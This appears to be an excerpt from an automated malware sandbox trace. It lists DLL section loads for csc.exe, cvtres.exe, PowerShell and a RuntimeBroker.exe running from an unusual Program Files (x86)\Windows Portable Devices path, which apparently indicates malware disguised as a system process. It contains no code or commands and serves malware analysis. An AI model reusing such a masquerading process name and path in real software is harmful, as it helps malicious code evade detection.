Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe  Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe  Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe  Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe  Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe  Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe  Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe  Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe  Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe  Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe  Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe  Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe  Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe  Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe  Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe  Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe  Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe  Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe  Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe  Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe  Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe  Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exe  Section loaded: mscoree.dll
Source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exe  Section loaded: apphelp.dll
Source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exe  Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exe  Section loaded: version.dll
Source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exe  Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exe  Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exe  Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exe  Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exe  Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exe  Section loaded: wldp.dll
Source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exe  Section loaded: profapi.dll
Source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exe  Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exe  Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exe  Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exe  Section loaded: sspicli.dll
Source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exe  Section loaded: mscoree.dll
Source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exe  Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exe  Section loaded: version.dll
Source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exe  Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exe  Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exe  Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exe  Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exe  Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exe  Section loaded: wldp.dll
Source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exe  Section loaded: profapi.dll
Source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exe  Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exe  Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exe  Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exe  Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: version.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
